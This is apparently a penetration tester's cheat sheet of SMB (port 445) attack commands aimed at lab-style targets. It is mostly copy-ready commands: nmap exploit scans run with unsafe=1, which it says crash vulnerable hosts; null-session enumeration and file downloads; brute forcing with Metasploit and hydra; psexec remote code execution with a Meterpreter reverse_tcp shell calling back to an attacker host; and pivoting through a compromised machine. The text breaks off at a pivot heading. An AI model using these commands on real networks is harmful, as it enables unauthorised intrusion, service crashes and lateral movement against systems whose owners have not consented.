---Port 445--- Can also be used with: 139 //this was pre 2000 windows as SMB was originally done via netbios and required a netbios connection. Now it is its own TCP protocol. Can be several other UDP ports when SMB is set up via Windows NetBios API ls -1 /usr/share/nmap/scripts/smb* /remember that all of these have arg uments that you can pass to with --script-args= we coul also just run all of them with: nmap -p 445 --script smb* <ip> SMB discover:(connect and return os/smb info) nmap 10.10.10.111 --script=smb-os-discovery SMB Vulnerability Scan: nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10 SMB Users & Shares Scan: nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10 Connect to SMB share: (Linux) smbclient //MOUNT/share smbclient -L 10.10.10.3 smbclient -L lame smbclient -U "" \\\\10.10.10.3\\tmp //also try to do a -N with this to say no password smbclient -N \\\\172.16.80.22\\tmp -U "" or smbclient -L 10.130.40.70 -U administrator (Windows) C:>net use \\10.130.40.70\IPC$ password /u:administrator C:>net view \\10.130.40.70 Nmap for SMB open: #nmap -p139,445 <range or CIDR> --open //only shows IPs with smb open or #nmap -v -p 139,445 10.11.1.1-254 Search for smb scripts in nmap NSE: #ls -l /usr/share/nmap/scripts/ |grep smb //use a script #nmap -p 139,445 --script smb-enum-users <ip> //check for vulns with check-vulns script #nmap -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 <ip> //Searching for IPs vuln to ms08-067 //script-arg is used to pass the script arguments. in this case we pass it unsafe 1 which will exploit and crash the system if vulnerable. #nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.1 1.1.5 SMB NULL session: Is an un authenticated netbios session. This is allowed to set up communications with new computers but can be abused up to windows xp svp1 as svp2 is patched. You can still look for incorrect configurations. A null session also allows unauthenticated hackers to obtain largeamounts of information about the machine, such as password policies, usernames,group names, machine names, user and host SIDs. This Microsoft feature existed inSMB1 by default SMB1 – Windows 2000, XP and Windows 2003. SMB2 – Windows Vista SP1 and Windows 2008 SMB2.1 – Windows 7 and Windows 2008 R2 SMB3 – Windows 8 and Windows 2012. -- Null: #nmblookup -A 10.10.10.175 #smbmap -H 10.10.10.175 List share contents: #smbmap -R Replication -H 10.10.10.10 Download a file:(will be placed in /usr/share) #smbmap -R Replication -H 10.10.10.10 -A file.txt -q Authed: #smbmap -d active.htb -u svc_tgs -p somepasswrd -H 10.10.10.10 List share contents: #smbmap -d active.htb -u svc_tgs -p somepasswrd -R Replication -H 10.10.10.10 Download a file:(will be placed in /usr/share) #smbmap -d active.htb -u svc_tgs -p somepasswrd -R Replication -H 10.10.10.10 -A file.txt -q -- Password Brute Forcing: (RDP and SMB), increasing the number of threads may not be possibledue to protocol restrictions, making the password guessing process relatively slow. Ontop of this, protocol authentication negotiations of a protocol such as RDP are more timeconsuming than, say, HTTP, which slows down the attacks on these protocols evenmore. However, while brute-forcing the RDP protocol may be a slower process thanHTTP, a successful attack on RDP would often provide a bigger reward. //With MSF #systemctl enable postgresql #msfdb init #msf msf > use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) > set PASS_FILE /usr/share/seclists/Passwords/best15.txt msf auxiliary(smb_login) > set USER_FILE /usr/share/seclists/Usernames/top_shortlist.txt msf auxiliary(smb_login) > set RHOSTS 10.130.40.70 msf auxiliary(smb_login) > run //hydra hydra -L usernames.txt -P /usr/share/john/password.lst 192.168.2.66 smb -V -f -look into dumpsec for automated dumping of smb Enumerate shares (Authenticated): #nmap --script=smb-enum-users -p 445 10.130.40.70 --script-args smbuser=administrator,smbpass=password //we can also use rpcclient and enumdomusers for this RCE (Authenticated): //Manual If we have writeable shares we can psexec #psexec.py active.htb/svc_tgs@10.10.10.10 //MSF msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 10.130.40.70 msf exploit(psexec) > set SMBPass password msf exploit(psexec) > set SMBUser administrator msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST 172.16.10.5 msf exploit(psexec) > exploit meterpreter > sysinfo --------------------- Post Exploitation ------------------- Host discovery: //This is to attempt pivoting from the compromised box that we are on. So first we will set up our routing then we will scan. meterpreter > run autoroute -s 172.30.111.0/24 meterpreter > background msf exploit(psexec) > use auxiliary/scanner/portscan/tcp msf auxiliary(tcp) > set RHOSTS 172.30.111.0/24 msf auxiliary(tcp) > set THREADS 10 msf auxiliary(tcp) > set PORTS 139,445 msf auxiliary(tcp) > run Null session pivot to another box: